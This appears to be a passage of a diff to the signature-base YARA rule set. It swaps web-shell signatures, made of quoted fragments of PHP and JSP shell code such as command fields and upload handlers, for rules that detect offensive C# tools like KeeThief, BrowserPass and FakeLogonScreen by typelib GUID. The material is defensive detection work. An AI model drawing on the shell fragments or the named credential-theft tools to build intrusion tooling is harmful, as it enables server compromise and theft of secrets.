-		hash20 = "71097537a91fac6b01f46f66ee2d7749"
-		hash21 = "2434a7a07cb47ce25b41d30bc291cacc"
-		hash22 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s1 = "\"<h2>Remote Control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var"
-		$s2 = "\"<p>Current File (import new file name and new file)<br /><input class=\\\"inpu"
-		$s3 = "\"<p>Current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i"
+		$typelibguid0lo = "2f43992e-5703-4420-ad0b-17cb7d89c956" ascii wide
+		$typelibguid1lo = "86d10a34-c374-4de4-8e12-490e5e65ddff" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_201_3_Ma_Download
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharp_Wmiexec : FILE
 {
 	meta:
-		description = "Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2377-L2396"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ae08a5a2-06d5-55fe-803a-7f4696220904"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/checkymander/Sharp-WMIExec"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3599-L3612"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "14eccd07e7bef9d570f75fc4adc204d175dcfbb5b950bdb3e25a65d3c5bb0310"
-		score = 70
+		logic_hash = "df683be102decfc65209195d0d2e640985dd7e7cf040fb074fb10c8749e98614"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "a7e25b8ac605753ed0c438db93f6c498"
-		hash1 = "fb8c6c3a69b93e5e7193036fd31a958d"
-		hash2 = "4cc68fa572e88b669bce606c7ace0ae9"
-		hash3 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$s0 = "<input title=\"Upload selected file to the current working directory\" type=\"Su"
-		$s5 = "<input title=\"Launch command in current directory\" type=\"Submit\" class=\"but"
-		$s6 = "<input title=\"Delete all selected files and directories incl. subdirs\" class="
+		$typelibguid0lo = "0a63b0a1-7d1a-4b84-81c3-bbbfe9913029" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Browser_201_3_400_In_Jfolder_Jfolder01_Jsp_Leo_Ma_Warn_Webshell_Nc_Download
+rule SIGNATURE_BASE_HKTL_NET_GUID_Keethief : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2397-L2424"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "71fef0e9-223a-5834-9d1c-f3fb8b66a809"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/GhostPack/KeeThief"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3614-L3632"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0bf0fd37b542c9362a47180ee03ea28995b48d483f72273e472292a320a3ddee"
-		score = 70
+		logic_hash = "f91aeb1862b803ae44c398a71e6c6ed0017d28206deffa39e4e0bca8faae6701"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
-		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
-		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
-		hash3 = "36331f2c81bad763528d0ae00edf55be"
-		hash4 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash5 = "8979594423b68489024447474d113894"
-		hash6 = "ec482fc969d182e5440521c913bab9bd"
-		hash7 = "f98d2b33cd777e160d1489afed96de39"
-		hash8 = "4b4c12b3002fad88ca6346a873855209"
-		hash9 = "4cc68fa572e88b669bce606c7ace0ae9"
-		hash10 = "e9a5280f77537e23da2545306f6a19ad"
-		hash11 = "598eef7544935cf2139d1eada4375bb5"
-		hash12 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$s4 = "UplInfo info = UploadMonitor.getInfo(fi.clientFileName);" fullword
-		$s5 = "long time = (System.currentTimeMillis() - starttime) / 1000l;" fullword
+		$typelibguid1lo = "39aa6f93-a1c9-497f-bad2-cc42a61d5710" ascii wide
+		$typelibguid3lo = "3fca8012-3bad-41e4-91f4-534aa9a44f96" ascii wide
+		$typelibguid4lo = "ea92f1e6-3f34-48f8-8b0a-f2bbc19220ef" ascii wide
+		$typelibguid5lo = "c23b51c4-2475-4fc6-9b3a-27d0a2b99b0f" ascii wide
+		$typelibguid7lo = "80ba63a4-7d41-40e9-a722-6dd58b28bf7e" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Shell_Phpspy_2006_Arabicspy
+rule SIGNATURE_BASE_HKTL_NET_GUID_Fakelogonscreen : FILE
 {
 	meta:
-		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2425-L2442"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cc20290c-3f34-5e81-9337-c582f1ee7ade"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/bitsadmin/fakelogonscreen"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3634-L3647"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bd9f1ffdbf94dd5a871fc7c3b31d2357e99265d02bfe1c836f82d251053dce7d"
-		score = 70
+		logic_hash = "93353997e52fda3cebb03c2c63afc16ea477d3d5d4a7cf8dee26940ccffecd7a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "791708057d8b429d91357d38edf43cc0"
-		hash1 = "40a1f840111996ff7200d18968e42cfe"
-		hash2 = "e0202adff532b28ef1ba206cf95962f2"
 
 	strings:
-		$s0 = "elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype"
-		$s8 = "echo \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"P"
+		$typelibguid0lo = "d35a55bd-3189-498b-b72f-dc798172e505" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_In_Jfolder_Jfolder01_Jsp_Leo_Warn
+rule SIGNATURE_BASE_HKTL_NET_GUID_Poshsecframework : FILE
 {
 	meta:
-		description = "Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2443-L2463"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a91620f3-3f21-525a-bc87-94d21cd126be"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/PoshSec/PoshSecFramework"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3649-L3663"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "00c3667438a688b990cf1c8bb6db52be7c6d1b36192dece4e8b07edda68f4b72"
-		score = 70
+		logic_hash = "6af81da2f23a0ad87d918e4ecb5869e8113b03e175c114e553856c4eabfacb71"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash1 = "8979594423b68489024447474d113894"
-		hash2 = "ec482fc969d182e5440521c913bab9bd"
-		hash3 = "f98d2b33cd777e160d1489afed96de39"
-		hash4 = "4b4c12b3002fad88ca6346a873855209"
-		hash5 = "e9a5280f77537e23da2545306f6a19ad"
 
 	strings:
-		$s4 = "sbFile.append(\"  &nbsp;<a href=\\\"javascript:doForm('down','\"+formatPath(strD"
-		$s9 = "sbFile.append(\" &nbsp;<a href=\\\"javascript:doForm('edit','\"+formatPath(strDi"
+		$typelibguid0lo = "b1ac6aa0-2f1a-4696-bf4b-0e41cf2f4b6b" ascii wide
+		$typelibguid1lo = "78bfcfc2-ef1c-4514-bce6-934b251666d2" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_2_520_Icesword_Job_Ma1_Ma4_2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpattack : FILE
 {
 	meta:
-		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2464-L2486"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1eb911ab-3fb9-54b7-8afb-66328f30d563"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/jaredhaight/SharpAttack"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3665-L3678"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "765efb4f776d9ffe5dab1b5decbb60df654e1de9ab8ae7e0437c5c8f717642b9"
-		score = 70
+		logic_hash = "eb2f706a8f91c0702472663d5c5672b0e0a9afa775668706377899b36bdb684c"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "64a3bf9142b045b9062b204db39d4d57"
-		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
-		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
-		hash3 = "56c005690da2558690c4aa305a31ad37"
-		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
-		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
-		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
 
 	strings:
-		$s2 = "private String[] _textFileTypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\","
-		$s3 = "\\\" name=\\\"upFile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typ"
-		$s9 = "if (request.getParameter(\"password\") == null && session.getAttribute(\"passwor"
+		$typelibguid0lo = "5f0ceca3-5997-406c-adf5-6c7fbb6cba17" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Phpspy_2005_Full_Phpspy_2005_Lite_PHPSPY
+rule SIGNATURE_BASE_HKTL_NET_GUID_Altman : FILE
 {
 	meta:
-		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2487-L2505"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "21acc8af-9497-5842-90a9-7a9300585d5d"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/keepwn/Altman"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3680-L3710"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "80c8e7b50aea91284a25ffd3a07d8705c24b6a95a58f42ec6043ececcff32dbb"
-		score = 70
+		logic_hash = "4d7046ac7a0deebb33a33995f4c2b9c6b65d4821262d55aecd8e00379ba93b00"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
-		hash2 = "0712e3dc262b4e1f98ed25760b206836"
 
 	strings:
-		$s6 = "<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['comma"
-		$s7 = "echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_FILE"
-		$s8 = "<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; "
+		$typelibguid0lo = "64cdcd2b-7356-4079-af78-e22210e66154" ascii wide
+		$typelibguid1lo = "f1dee29d-ca98-46ea-9d13-93ae1fda96e1" ascii wide
+		$typelibguid2lo = "33568320-56e8-4abb-83f8-548e8d6adac2" ascii wide
+		$typelibguid3lo = "470ec930-70a3-4d71-b4ff-860fcb900e85" ascii wide
+		$typelibguid4lo = "9514574d-6819-44f2-affa-6158ac1143b3" ascii wide
+		$typelibguid5lo = "0f3a9c4f-0b11-4373-a0a6-3a6de814e891" ascii wide
+		$typelibguid6lo = "9624b72e-9702-4d78-995b-164254328151" ascii wide
+		$typelibguid7lo = "faae59a8-55fc-48b1-a9b5-b1759c9c1010" ascii wide
+		$typelibguid8lo = "37af4988-f6f2-4f0c-aa2b-5b24f7ed3bf3" ascii wide
+		$typelibguid9lo = "c82aa2fe-3332-441f-965e-6b653e088abf" ascii wide
+		$typelibguid10lo = "6e531f6c-2c89-447f-8464-aaa96dbcdfff" ascii wide
+		$typelibguid11lo = "231987a1-ea32-4087-8963-2322338f16f6" ascii wide
+		$typelibguid12lo = "7da0d93a-a0ae-41a5-9389-42eff85bb064" ascii wide
+		$typelibguid13lo = "a729f9cc-edc2-4785-9a7d-7b81bb12484c" ascii wide
+		$typelibguid14lo = "55a1fd43-d23e-4d72-aadb-bbd1340a6913" ascii wide
+		$typelibguid15lo = "d43f240d-e7f5-43c5-9b51-d156dc7ea221" ascii wide
+		$typelibguid16lo = "c2e6c1a0-93b1-4bbc-98e6-8e2b3145db8e" ascii wide
+		$typelibguid17lo = "714ae6f3-0d03-4023-b753-fed6a31d95c7" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Shell_Phpspy_2006_Arabicspy_Hkrkoz
+rule SIGNATURE_BASE_HKTL_NET_GUID_Browserpass : FILE
 {
 	meta:
-		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2506-L2523"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "bad36c36-dbed-527c-a2f5-4dceff1abe4b"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/jabiel/BrowserPass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3712-L3725"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "228e0a73f14da2957f75ae898fdbcf2386deb366df6ddc312162ab723bac44ba"
-		score = 70
+		logic_hash = "ce5f5eaa71fd7358d99743e56a8518c1a852faa39c4a7d1888e0a218e9e7a8ef"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "791708057d8b429d91357d38edf43cc0"
-		hash1 = "40a1f840111996ff7200d18968e42cfe"
-		hash2 = "e0202adff532b28ef1ba206cf95962f2"
-		hash3 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s5 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
+		$typelibguid0lo = "3cb59871-0dce-453b-857a-2d1e515b0b66" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_C99_Shell_Ci_Biz_Was_Here_C100_V_Xxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Mythic : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2524-L2543"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "44237fac-1526-5587-83a1-61d7a54f7da9"
+		date = "2020-12-29"
+		modified = "2025-08-15"
+		reference = "https://github.com/its-a-feature/Mythic"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3727-L3741"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ccc3cb553f7b5d089a43612d48522cc4a66b4a8ab433321ae1a716a8fa57b62c"
-		score = 70
+		logic_hash = "3d3b942e110bbf181ecbda5d4b3c2f7775e8e9b4860722238fe686c36422d456"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
-		hash1 = "f2fa878de03732fbf5c86d656467ff50"
-		hash2 = "27786d1e0b1046a1a7f67ee41c64bf4c"
-		hash3 = "0f5b9238d281bc6ac13406bb24ac2a5b"
-		hash4 = "68c0629d08b1664f5bcce7d7f5f71d22"
-		hash5 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s8 = "else {echo \"Running datapipe... ok! Connect to <b>\".getenv(\"SERVER_ADDR\""
+		$typelibguid0lo = "91f7a9da-f045-4239-a1e9-487ffdd65986" ascii wide
+		$typelibguid1lo = "0405205c-c2a0-4f9a-a221-48b5c70df3b6" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_2008_2009Lite_2009Mssql
+rule SIGNATURE_BASE_HKTL_NET_GUID_Nuages : FILE
 {
 	meta:
-		description = "Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2544-L2561"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5ad947e2-bd71-50d4-9bbf-4d018c7ff36a"
+		date = "2020-12-29"
+		modified = "2025-08-15"
+		reference = "https://github.com/p3nt4/Nuages"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3743-L3756"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ae33048856440e25972aa5483b60e775f50f60a9ef5e77a58edd60eacdcd9ee3"
-		score = 70
+		logic_hash = "a0d7d89449a6a21bd118ace6a7062ff8d1fa356cf2421cc8c53f2da3719e52fb"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
-		hash1 = "3f4d454d27ecc0013e783ed921eeecde"
-		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
 
 	strings:
-		$s0 = "<a href=\"javascript:godir(\\''.$drive->Path.'/\\');"
-		$s7 = "p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all"
+		$typelibguid0lo = "e9e80ac7-4c13-45bd-9bde-ca89aadf1294" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Shell_Phpspy_2005_Full_Phpspy_2005_Lite_Phpspy_2006_Arabicspy_PHPSPY_Hkrkoz
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsniper : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2562-L2583"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "14e6a3b8-5e1f-5dd8-9b51-22522ac317e7"
+		date = "2020-12-29"
+		modified = "2025-08-15"
+		reference = "https://github.com/HunnicCyber/SharpSniper"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3758-L3771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5da06481cf789e71969a5b54a33bfab41e08a1961cc056604a696203fef48422"
-		score = 70
+		logic_hash = "52ae4a89b9cca9bee19e904617ed8c78857a9cee58d691f337fd4a736798aa1e"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "791708057d8b429d91357d38edf43cc0"
-		hash1 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash2 = "42f211cec8032eb0881e87ebdb3d7224"
-		hash3 = "40a1f840111996ff7200d18968e42cfe"
-		hash4 = "e0202adff532b28ef1ba206cf95962f2"
-		hash5 = "0712e3dc262b4e1f98ed25760b206836"
-		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s0 = "$mainpath_info           = explode('/', $mainpath);" fullword
-		$s6 = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d"
+		$typelibguid0lo = "c8bb840c-04ce-4b60-a734-faf15abf7b18" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_807_Dm_Jspspyjdk5_M_Cofigrue
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharphound3 : FILE
 {
 	meta:
-		description = "Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2584-L2603"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "58001912-88a1-527d-9d3e-d7c376a1fce4"
+		date = "2020-12-29"
+		modified = "2025-08-15"
+		reference = "https://github.com/BloodHoundAD/SharpHound3"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3773-L3786"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0fc7ac740e147bd3703dac74743b19148aa7bb359cc5f347acf3b0dbe26bf752"
-		score = 70
+		logic_hash = "9de8457f59133adb09df0c40ece45331ac716fd56d58bd37a40ce7f1d0a53378"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash1 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash2 = "341298482cf90febebb8616426080d1d"
-		hash3 = "88fc87e7c58249a398efd5ceae636073"
-		hash4 = "349ec229e3f8eda0f9eb918c74a8bf4c"
 
 	strings:
-		$s1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword
-		$s9 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(),  \"GBK\");" fullword
+		$typelibguid0lo = "a517a8de-5834-411d-abda-2d0e1766539c" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Dive_Shell_1_0_Emperor_Hacking_Team_Xxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Blocketw : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2604-L2621"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c2b72fef-6549-5b53-8ccf-232e8d152e96"
+		date = "2020-12-29"
+		modified = "2025-08-15"
